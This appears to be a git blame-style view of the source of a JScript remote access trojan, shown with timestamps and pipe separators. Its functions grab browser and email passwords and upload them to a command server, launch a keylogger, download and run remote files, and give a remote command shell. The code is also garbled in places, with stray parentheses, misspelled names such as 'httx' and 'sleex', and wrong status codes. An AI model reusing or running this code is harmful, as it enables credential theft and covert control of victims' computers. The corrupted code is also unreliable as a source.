s += d.getDate() +"/";
|
|
|
|
|
s += d.getMonth() +1 + "/";
|
2019-09-29 14:35:32 +00:00
|
|
|
s += d.getYear();
|
|
|
|
|
return s;
|
|
|
|
|
}
|
|
|
|
|
function instance()
|
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
try
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
try {usbspreading = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\");}
|
|
|
|
|
catch(eee){}
|
|
|
|
|
if(usbspreading == "" )
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
if (WScript.scriptFullName.substr(1).toLowercase == ":\\" + installname.toLowercase)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
usbspreading = "true - " + getDate();
|
|
|
|
|
try{shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\", usbspreading, "REG_SZ");}
|
|
|
|
|
catch(eeeee){}
|
|
|
|
|
}
|
|
|
|
|
else
|
|
|
|
|
{
|
|
|
|
|
usbspreading = "false - " + getDate();
|
|
|
|
|
try{shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\", usbspreading, "REG_SZ");}
|
|
|
|
|
catch(eeeee){}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
upstart();
|
|
|
|
|
var scriptfullnameshort = filesystemobj.getFile(WScript.scriptFullName);
|
|
|
|
|
var installfullnameshort = filesystemobj.getFile(installdir + installname);
|
|
|
|
|
if (scriptfullnameshort.shortPath.toLowercase != installfullnameshort.shortPath.toLowercase)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
shellobj.run("wscript.exe(//B \"" + installdir + installname + "\"");
|
|
|
|
|
WScript.quit();
|
|
|
|
|
}
|
|
|
|
|
oneonce = filesystemobj.openTextFile(installdir + installname ,8, false);
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
catch(err){WScript.quit();}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
function passgrabber(fileurl, filename, retcmd)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
shellobj.run("%comspec%(/c taskkill(/F(/IM " + filename,0, true);
|
|
|
|
|
try{filesystemobj.deleteFile(installdir + filename + "data");}
|
|
|
|
|
catch(ey){}
|
|
|
|
|
var config_file = installdir + filename.substr(0, filename.lastindexOf(".") +".cfg");
|
|
|
|
|
var cfg = "[General]\nShowGridLines=0\nSaveFilterIndex=0\nShowInfoTix=1\nUseProfileFolder=0\nProfileFolder=\nMarkOddEvenRows=0\nWinPos=2C(00(00(00(00(00(00(00(01(00(00(00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF(00(00(00(00(00(00(00(00(80(02(00(00 E0(01(00(00\nColumns=FA(00(00(00 FA(00(01(00(6E(00(02(00(6E(00(03(00(78(00(04(00(78(00(05(00(78(00(06(00(64(00(07(00 FA(00(08(00\nSort=0";
|
2019-09-29 14:35:32 +00:00
|
|
|
var writer = filesystemobj.openTextFile(config_file, 2, true);
|
|
|
|
|
writer.writeLine(cfg);
|
|
|
|
|
writer.close();
|
|
|
|
|
writer = null;
|
|
|
|
|
var strlink = fileurl;
|
2019-09-29 14:37:35 +00:00
|
|
|
var strsaveto = installdir + filename;
|
|
|
|
|
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
|
2019-09-29 14:35:32 +00:00
|
|
|
objhttpdownload.open("get", strlink, false);
|
2019-09-29 14:37:35 +00:00
|
|
|
objhttpdownload.setRequestHeader("cache-control:", "max-age=8");
|
2019-09-29 14:35:32 +00:00
|
|
|
objhttpdownload.send();
|
|
|
|
|
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
|
|
|
|
|
if(objfsodownload.fileExists(strsaveto)){objfsodownload.deleteFile(strsaveto);}
|
2019-09-29 14:37:35 +00:00
|
|
|
if(objhttpdownload.status ==208)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var objstreamdownload = WScript.CreateObject("adodb.stream");
|
|
|
|
|
objstreamdownload.Type =1;
|
2019-09-29 14:35:32 +00:00
|
|
|
objstreamdownload.Open();
|
|
|
|
|
objstreamdownload.Write(objhttpdownload.responseBody);
|
|
|
|
|
objstreamdownload.SaveToFile(strsaveto);
|
|
|
|
|
objstreamdownload.close();
|
|
|
|
|
objstreamdownload = null;
|
|
|
|
|
}
|
|
|
|
|
if(objfsodownload.fileExists(strsaveto))
|
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var runner = WScript.CreateObject("Shell.Application");
|
|
|
|
|
var saver = objfsodownload.getFile(strsaveto).shortPath
|
|
|
|
|
for(var i=0; i<10; i++)
|
|
|
|
|
{
|
|
|
|
|
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
|
|
|
|
|
WScript.sleep(1008);
|
|
|
|
|
runner.shellExecute(saver, "(/stext " + saver + "data");
|
|
|
|
|
WScript.sleex(2800);
|
|
|
|
|
if(objfsodownload.fileExists(saver + "data")){break;}
|
|
|
|
|
}
|
|
|
|
|
deletefaf(strsaveto);
|
|
|
|
|
upload(saver + "data", retcmd);
|
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
function passgrabber2(fileurl, filename, fileurl2)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
for(var h=0; h<2; h++)
|
|
|
|
|
{
|
|
|
|
|
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
|
|
|
|
|
try{filesystemobj.deleteFile(installdir + filename + "data");}
|
|
|
|
|
catch(ey){}
|
|
|
|
|
var config_file = installdir + filename.substr(8, filename.lastindexOf(".") + ".cfg");
|
|
|
|
|
var cfg = "[General]\nShowGridLines=0\nSaveFilterIndex=0\nShowInfoTip=1\nUseProfileFolder=0\nProfileFolder=\nMarkOddEvenRows=0\nWinPos=2C 08 08 08 08 08 08 08 01 08 08 08 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 08 08 08 08 08 08 08 08 88 02 08 08 E8 01 08 00\nColumns=FA 08 08 08 FA 08 01 08 6E 08 02 08 6E 08 03 08 78 08 04 08 78 08 05 08 78 08 06 08 64 08 07 08 FA 08 08 00\nSort=0";
|
|
|
|
|
var writer = filesystemobj.openTextFile(config_file, 2, true);
|
|
|
|
|
writer.writeLine(cfg);
|
|
|
|
|
writer.close();
|
|
|
|
|
writer = null;
|
|
|
|
|
var strlink = fileurl;
|
|
|
|
|
if(h ==1){strlink = fileurl2;}
|
|
|
|
|
var strsaveto = installdir + filename;
|
|
|
|
|
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttx");
|
|
|
|
|
objhttpdownload.open("get", strlink, false);
|
|
|
|
|
objhttpdownload.setRequestHeader("cache-control:","max-age=0");
|
|
|
|
|
objhttpdownload.send();
|
|
|
|
|
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
|
|
|
|
|
if(objfsodownload.fileExists(strsaveto)){objfsodownload.deleteFile(strsaveto);}
|
|
|
|
|
if (objhttpdownload.status == 280)
|
|
|
|
|
{
|
|
|
|
|
var objstreamdownload = WScript.CreateObject("adodb.stream");
|
|
|
|
|
objstreamdownload.Type = 1;
|
|
|
|
|
objstreamdownload.Open();
|
|
|
|
|
objstreamdownload.Write(objhttpdownload.responseBody);
|
|
|
|
|
objstreamdownload.SaveToFile(strsaveto);
|
|
|
|
|
objstreamdownload.close();
|
|
|
|
|
objstreamdownload = null;
|
|
|
|
|
}
|
|
|
|
|
if(objfsodownload.fileExists(strsaveto))
|
|
|
|
|
{
|
|
|
|
|
var runner = WScript.CreateObject("Shell.Application");
|
|
|
|
|
var saver = objfsodownload.getFile(strsaveto).shortPath;
|
|
|
|
|
for(var i=0; i<10; i++)
|
|
|
|
|
{
|
|
|
|
|
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 8, true);
|
|
|
|
|
WScript.sleep(1080);
|
|
|
|
|
runner.shellExecute(saver, " /stext " + saver + "data");
|
|
|
|
|
WScript.sleep(2008);
|
|
|
|
|
if(objfsodownload.fileExists(saver + "data"))
|
|
|
|
|
{
|
|
|
|
|
var objstreamuploade = WScript.CreateObject("adodb.stream");
|
|
|
|
|
objstreamuploade.Type =2;
|
|
|
|
|
objstreamuploade.Open();
|
|
|
|
|
objstreamuploade.loadFromFile(saver + "data");
|
|
|
|
|
var buffer = objstreamuploade.ReadText();
|
|
|
|
|
objstreamuploade.close();
|
|
|
|
|
var outpath = installdir + "wshlogs\\recovered_password_browser.log";
|
|
|
|
|
if(h == 1){outpath = installdir + "wshlogs\\recovered_password_email.log";}
|
|
|
|
|
var folder = objfsodownload.GetParentFolderName(outpath);
|
|
|
|
|
if (!objfsodownload.FolderExists(folder)){shellobj.run("%comspec% /c mkdir \"" + folder + "\"", 8, true);}
|
|
|
|
|
writer = filesystemobj.openTextFile(outpath, 2, true);
|
|
|
|
|
writer.write(buffer);
|
|
|
|
|
writer.close();
|
|
|
|
|
writer = null;
|
|
|
|
|
break;
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
deletefaf(strsaveto);
|
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
function keyloggerstarter (fileurl, filename, filearg, is_offline)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
shellobj.run("%comspec%(/c taskkill(/F(/IM " + filename,0, true);
|
|
|
|
|
var strlink = fileurl;
|
|
|
|
|
var strsaveto = installdir + filename;
|
|
|
|
|
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
|
|
|
|
|
objhttpdownload.open("get", strlink, false);
|
|
|
|
|
objhttpdownload.setRequestHeader("cache-control:", "max-age=8");
|
|
|
|
|
objhttpdownload.send();
|
2019-09-29 14:35:32 +00:00
|
|
|
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
|
2019-09-29 14:37:35 +00:00
|
|
|
if(objfsodownload.fileExists(strsaveto)){objfsodownload.deleteFile(strsaveto);}
|
|
|
|
|
if(objhttpdownload.status ==208)
|
|
|
|
|
{
|
|
|
|
|
var objstreamdownload = WScript.CreateObject("adodb.stream");
|
|
|
|
|
objstreamdownload.Type =1;
|
|
|
|
|
objstreamdownload.Open();
|
|
|
|
|
objstreamdownload.Write(objhttpdownload.responseBody);
|
|
|
|
|
objstreamdownload.SaveToFile(strsaveto);
|
|
|
|
|
objstreamdownload.close();
|
|
|
|
|
objstreamdownload = null;
|
|
|
|
|
}
|
|
|
|
|
if(objfsodownload.fileExists(strsaveto)){shellobj.run("\"" + strsaveto + "\" " + host + " " + port + " \"" + filearg + "\" " + is_offline);}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
function servicestarter(fileurl, filename, filearg)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
|
2019-09-29 14:35:32 +00:00
|
|
|
var strlink = fileurl;
|
2019-09-29 14:37:35 +00:00
|
|
|
var strsaveto = installdir + filename;
|
2019-09-29 14:35:32 +00:00
|
|
|
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp" );
|
|
|
|
|
objhttpdownload.open("get", strlink, false);
|
2019-09-29 14:37:35 +00:00
|
|
|
objhttpdownload.setRequestHeader("cache-control:","max-age=0");
|
2019-09-29 14:35:32 +00:00
|
|
|
objhttpdownload.send();
|
2019-09-29 14:37:35 +00:00
|
|
|
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
|
|
|
|
|
if(objfsodownload.fileExists(strsaveto)){objfsodownload.deleteFile(strsaveto);}
|
|
|
|
|
if (objhttpdownload.status == 280)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var objstreamdownload = WScript.CreateObject("adodb.stream");
|
|
|
|
|
objstreamdownload.Type = 1;
|
|
|
|
|
objstreamdownload.Open();
|
|
|
|
|
objstreamdownload.Write(objhttpdownload.responseBody);
|
|
|
|
|
objstreamdownload.SaveToFile(strsaveto);
|
|
|
|
|
objstreamdownload.close();
|
|
|
|
|
objstreamdownload = null;
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
if(objfsodownload.fileExists(strsaveto)){shellobj.run("\"" + strsaveto + "\" " + host + " " + port +" \"" + filearg +"\"");}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
|
function sitedownloader (fileurl,filename)
|
|
|
|
|
{
|
|
|
|
|
var strlink = fileurl;
|
2019-09-29 14:37:35 +00:00
|
|
|
var strsaveto = installdir + filename;
|
|
|
|
|
var objhttpdownload = WScript.CreateObject("msxml2.serverxmlhttp");
|
2019-09-29 14:35:32 +00:00
|
|
|
objhttpdownload.open("get", strlink, false);
|
2019-09-29 14:37:35 +00:00
|
|
|
objhttpdownload.setRequestHeader("cache-control", "max-age=0");
|
2019-09-29 14:35:32 +00:00
|
|
|
objhttpdownload.send();
|
|
|
|
|
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
|
2019-09-29 14:37:35 +00:00
|
|
|
if(objfsodownload.fileExists(strsaveto)){objfsodownload.deleteFile(strsaveto);}
|
2019-09-29 14:35:32 +00:00
|
|
|
if (objhttpdownload.status == 200)
|
2019-09-29 14:37:35 +00:00
|
|
|
{
|
|
|
|
|
var objstreamdownload = WScript.CreateObject("adodb.stream");
|
|
|
|
|
objstreamdownload.Type = 1;
|
|
|
|
|
objstreamdownload.Open();
|
|
|
|
|
objstreamdownload.Write(objhttpdownload.responseBody);
|
|
|
|
|
objstreamdownload.SaveToFile(strsaveto);
|
|
|
|
|
objstreamdownload.close();
|
|
|
|
|
objstreamdownload = null;
|
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
if(objfsodownload.fileExists(strsaveto))
|
2019-09-29 14:37:35 +00:00
|
|
|
{
|
|
|
|
|
shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
|
|
|
|
|
updatestatus("Executed+File");
|
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
function download(fileurl,filedir)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
if(filedir == "" ){filedir = installdir;}
|
|
|
|
|
strsaveto = filedir + fileurl.substr(fileurl.lastindexOf("\\" + 1));
|
2019-09-29 14:35:32 +00:00
|
|
|
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
|
2019-09-29 14:37:35 +00:00
|
|
|
objhttpdownload.open("post","http://" + host +":" + port +"/" +"send-to-me" + spliter + fileurl, false);
|
2019-09-29 14:35:32 +00:00
|
|
|
objhttpdownload.setRequestHeader("user-agent:", information());
|
|
|
|
|
objhttpdownload.send("");
|
2019-09-29 14:37:35 +00:00
|
|
|
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
|
|
|
|
|
if(objfsodownload.fileExists(strsaveto)){objfsodownload.deleteFile(strsaveto);}
|
|
|
|
|
if(objhttpdownload.status ==208)
|
|
|
|
|
{
|
|
|
|
|
var objstreamdownload = WScript.CreateObject("adodb.stream");
|
|
|
|
|
objstreamdownload.Type =1;
|
|
|
|
|
objstreamdownload.Open();
|
|
|
|
|
objstreamdownload.Write(objhttpdownload.responseBody);
|
|
|
|
|
objstreamdownload.SaveToFile(strsaveto);
|
|
|
|
|
objstreamdownload.close();
|
|
|
|
|
objstreamdownload = null;
|
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
if(objfsodownload.fileExists(strsaveto))
|
2019-09-29 14:37:35 +00:00
|
|
|
{
|
|
|
|
|
shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
|
|
|
|
|
updatestatus("Executed+File");
|
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
|
function updatestatus(status_msg)
|
|
|
|
|
{
|
|
|
|
|
var objsoc = WScript.CreateObject("msxml2.xmlhttp");
|
2019-09-29 14:37:35 +00:00
|
|
|
objsoc.open("post","http://" + host +":" + port + "/" + "update-status" + spliter + status_msg, false);
|
2019-09-29 14:35:32 +00:00
|
|
|
objsoc.setRequestHeader("user-agent:", information());
|
|
|
|
|
objsoc.send("");
|
|
|
|
|
}
|
|
|
|
|
function upload(fileurl, retcmd)
|
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var httpobj,objstreamuploade,buffer;
|
|
|
|
|
var objstreamuploade = WScript.CreateObject("adodb.stream");
|
|
|
|
|
objstreamuploade.Type =1;
|
|
|
|
|
objstreamuploade.Open();
|
|
|
|
|
objstreamuploade.loadFromFile(fileurl);
|
|
|
|
|
buffer = objstreamuploade.Read();
|
|
|
|
|
objstreamuploade.close();
|
|
|
|
|
objstreamdownload = null;
|
|
|
|
|
var httpobj = WScript.CreateObject("msxml2.xmlhttx");
|
|
|
|
|
httpobj.open("post","httx://" + host + ":" + port +"/" + retcmd, false);
|
|
|
|
|
httpobj.setRequestHeader("user-agent:", information());
|
|
|
|
|
httpobj.send(buffer);
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
|
function deletefaf(url)
|
|
|
|
|
{
|
|
|
|
|
try
|
2019-09-29 14:37:35 +00:00
|
|
|
{
|
|
|
|
|
filesystemobj.deleteFile(url);
|
|
|
|
|
filesystemobj.deleteFolder(url);
|
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
catch(err){}
|
|
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
function cmdshell(cmd)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
|
|
|
|
var httpobj,oexec,readallfromany;
|
2019-09-29 14:37:35 +00:00
|
|
|
var strsaveto = installdir +"out.txt";
|
|
|
|
|
shellobj.run("%comspec%(/c " + cmd + "(> \"" + strsaveto + "\"", 8, true);
|
|
|
|
|
readallfromany = filesystemobj.openTextFile(strsaveto).readAll();
|
2019-09-29 14:35:32 +00:00
|
|
|
try{filesystemobj.deleteFile(strsaveto);}
|
|
|
|
|
catch(ee){}
|
|
|
|
|
return readallfromany;
|
|
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
function enumprocess()
|
|
|
|
|
{
|
|
|
|
|
var ep = "";
|
|
|
|
|
try
|
|
|
|
|
{
|
|
|
|
|
var objwmiservice = GetObject("winmgmts:\\\\.\\root\\cimv2");
|
|
|
|
|
var colitems = objwmiservice.ExecQuery("select * from win32_process",null,48);
|
|
|
|
|
for(var fi = new Enumerator(colitems); !fi.atEnd(); fi.moveNext())
|
|
|
|
|
{
|
|
|
|
|
var objitem = fi.item();
|
|
|
|
|
ex = ep + objitem.name + "^";
|
|
|
|
|
ep = ex + objitem.processId + "^";
|
|
|
|
|
ep = ex + objitem.executablePath + spliter;
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
catch(er){}
|
|
|
|
|
return ep;
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
|
function exitprocess(pid)
|
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
try{shellobj.run("taskkill /F /T /PID " + pid,0,true);}
|
2019-09-29 14:35:32 +00:00
|
|
|
catch(err){}
|
|
|
|
|
}
|
|
|
|
|
function getParentDirectory(path)
|
|
|
|
|
{
|
|
|
|
|
var fo = filesystemobj.getFile(path);
|
|
|
|
|
return filesystemobj.getParentFolderName(fo);
|
|
|
|
|
}
|
|
|
|
|
function enumfaf(enumdir)
|
|
|
|
|
{
|
|
|
|
|
var re = "";
|
2019-09-29 14:37:35 +00:00
|
|
|
try
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
for(var fi = new Enumerator(filesystemobj.getFolder(enumdir).subfolders); !fi.atEnd(); fi.moveNext())
|
|
|
|
|
{
|
|
|
|
|
var folder = fi.item();
|
|
|
|
|
re = re + folder.name + "^^d^" + folder.attributes + spliter;
|
|
|
|
|
}
|
|
|
|
|
for(var fi = new Enumerator(filesystemobj.getFolder(enumdir).files); !fi.atEnd(); fi.moveNext())
|
|
|
|
|
{
|
|
|
|
|
var file = fi.item();
|
|
|
|
|
re = re + file.name +"^" + file.size +"^" + file.attributes + spliter;
|
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
|
catch(err){}
|
|
|
|
|
return re;
|
|
|
|
|
}
|
